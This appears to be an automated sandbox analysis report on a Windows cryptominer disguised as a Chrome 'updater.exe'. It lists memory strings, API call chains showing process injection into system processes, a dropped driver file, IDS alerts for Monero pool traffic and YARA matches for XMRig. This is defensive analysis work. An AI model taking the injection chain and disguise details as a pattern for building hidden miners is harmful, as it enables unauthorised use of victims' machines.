                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC64BE3C FindFirstFileExW,7_2_00000225DC64BE3C
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6ABE3C FindFirstFileExW,7_2_00000225DC6ABE3C
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AEBE3C FindFirstFileExW,8_2_00000202C0AEBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A66130BE3C FindFirstFileExW,9_2_000002A66130BE3C
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE29BE3C FindFirstFileExW,10_2_000002BAAE29BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879CBE3C FindFirstFileExW,11_2_0000026A879CBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537ABE3C FindFirstFileExW,12_2_00000179537ABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D4BE3C FindFirstFileExW,12_2_0000017953D4BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D56BE3C FindFirstFileExW,13_2_000002295D56BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E6BE3C FindFirstFileExW,14_2_0000025306E6BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3BBE3C FindFirstFileExW,15_2_000001845B3BBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD4BE3C FindFirstFileExW,16_2_000001ADECD4BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55907BE3C FindFirstFileExW,17_2_000001D55907BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EABE3C FindFirstFileExW,18_2_00000241A9EABE3C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3EBE3C FindFirstFileExW,21_2_000002152C3EBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7319BE3C FindFirstFileExW,24_2_000001CD7319BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E89BE3C FindFirstFileExW,26_2_000002824E89BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8FBE3C FindFirstFileExW,26_2_000002824E8FBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B3BE3C FindFirstFileExW,27_2_0000021B47B3BE3C
                Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51734 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49736 -> 45.76.89.70:80
                Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: lsass.exe, 00000008.00000002.2986292449.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: lsass.exe, 00000008.00000000.1747836677.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2992018562.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                Source: lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
                Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: svchost.exe, 00000012.00000002.2989122565.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1819526785.000001FA481B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

                Operating System Destruction

                barindex
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess information set: 01 00 00 00 Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess information set: 01 00 00 00 Jump to behavior

                System Summary

                barindex
                Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB310C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,4_2_00007FF78AB310C0
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey,7_2_00000225DC642A7C
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AE21CC NtQuerySystemInformation,StrCmpNIW,8_2_00000202C0AE21CC
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,8_2_00000202C0AE26F0
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE292A7C NtEnumerateValueKey,NtEnumerateValueKey,10_2_000002BAAE292A7C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3B23F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,15_2_000001845B3B23F0
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3B21CC NtQuerySystemInformation,StrCmpNIW,15_2_000001845B3B21CC
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to behavior
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB314E44_2_00007FF78AB314E4
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB323284_2_00007FF78AB32328
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB326E84_2_00007FF78AB326E8
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB31DB44_2_00007FF78AB31DB4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B7F52FA5_2_00007FFD9B7F52FA
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6216587_2_00000225DC621658
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC61B23C7_2_00000225DC61B23C
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC61F2F87_2_00000225DC61F2F8
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC61B0307_2_00000225DC61B030
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6120DC7_2_00000225DC6120DC
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6522587_2_00000225DC652258
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC64BE3C7_2_00000225DC64BE3C
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC64FEF87_2_00000225DC64FEF8
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC64BC307_2_00000225DC64BC30
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC642CDC7_2_00000225DC642CDC
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6816587_2_00000225DC681658
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC67B23C7_2_00000225DC67B23C
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC67F2F87_2_00000225DC67F2F8
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC67B0307_2_00000225DC67B030
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6720DC7_2_00000225DC6720DC
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6B22587_2_00000225DC6B2258
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6ABE3C7_2_00000225DC6ABE3C
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6AFEF87_2_00000225DC6AFEF8
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6ABC307_2_00000225DC6ABC30
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6A2CDC7_2_00000225DC6A2CDC
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AC16588_2_00000202C0AC1658
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0ABB23C8_2_00000202C0ABB23C
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0ABF2F88_2_00000202C0ABF2F8
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0ABB0308_2_00000202C0ABB030
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AB20DC8_2_00000202C0AB20DC
